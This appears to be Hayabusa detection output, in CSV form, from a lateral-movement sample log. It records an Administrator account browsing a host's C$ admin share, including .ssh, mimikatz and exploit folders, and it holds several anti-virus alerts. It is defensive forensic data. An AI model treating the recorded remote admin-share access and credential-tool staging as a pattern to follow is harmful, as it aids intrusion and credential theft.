2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\.ssh | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\New folder | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\RDPWrap-v1.6.2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\translations | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\db | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\garbage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\platforms | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\db | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\platforms | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\winrar-cve | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
